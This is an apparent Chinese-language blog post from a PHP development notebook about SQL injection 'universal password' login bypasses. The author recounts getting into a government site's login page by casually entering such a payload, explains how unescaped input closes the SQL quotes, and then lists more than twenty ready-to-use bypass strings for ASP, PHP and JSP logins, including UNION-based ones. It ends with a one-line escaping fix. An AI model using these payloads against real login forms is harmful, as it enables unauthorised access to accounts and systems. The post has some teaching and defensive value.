萬能密碼漏洞02 · php開發筆記

本來都不打算講這個漏洞的（感覺太low了），但是在最近的一次滲透測試中，居然發現了這個漏洞，而且還是政府的網站……所以還是打算講一下吧最近在一次爬網站地址時，發現了這個登錄界面，隨手輸入了一個萬能密碼，沒想到居然進去了漏洞原理：網站把密碼放到數據庫中，在登陸驗證中一般都用以下sql查詢語句去查找數據庫 ``` sql=select * from user where username=’username’　 sql=”select * from user where username='”&username&”‘and pass='”& pass&'” ``` 假設數據庫中存放用戶信息的表是admin，其中存放用戶名的字段是username，存放密碼的字段是password，在用戶驗證頁面中用來接收用戶所輸入的用戶名和密碼的變量也分別是username和password，當用戶在用戶驗證頁面輸入用戶名和密碼后，會提交給如下的語句進行處理： ``` select * from admin where `username` = ‘$userrname’ and `password` = ‘$password’ 這樣，當用戶輸入用戶名’or ” = ‘時，相應的語句就變成了 select * from admin where `username` = ‘’ or ‘’ =‘’and `password` = ‘’ ``` 在這個語句中，where后面所指定的條件永久成立，因而就可以繞過身份驗證，也就成為了所謂的萬能密碼。萬能密碼中開頭和結尾的單引號，主要是為了將查詢語句中引用變量的單引號閉合。因而掌握了這個特點之后，我們就可以來任意構造萬能密碼，比如下面的幾種形式： ``` asp aspx萬能密碼 1： “or “a”=”a 2： ‘)or(‘a’=’a 3：or 1=1– 4：’or 1=1– 5：a’or’ 1=1– 6： “or 1=1– 7：’or’a’=’a 8： “or”=”a’=’a 9：’or”=’ 10：’or’=’or’ 11: 1 or ‘1’=’1’=1 12: 1 or ‘1’=’1′ or 1=1 13: ‘OR 1=1%00 14: “or 1=1%00 15: ‘xor 16: 新型萬能登陸密碼用戶名 ‘ UNION Select 1,1,1 FROM admin Where ”=’ （替換表名admin）密碼 1 Username=-1%cf’ union select 1,1,1 as password,1,1,1 %23 Password=1 17..admin’ or ‘a’=’a 密碼隨便 ``` PHP萬能密碼 ``` ‘or’=’or’ ‘or 1=1/* 字符型 GPC是否開都可以使用 User: something Pass: ‘ OR ‘1’=’1 jsp 萬能密碼 1’or’1’=’1 admin’ OR 1=1/* 用戶名：admin 系統存在這個用戶的時候才用得上密碼：1’or’1’=’1 ``` 修復方案：修改根目錄下的post.php文件 ``` $user =$_POST[‘user’];修改成 $user = mysql_real_escape_string($_POST[‘user’]); ```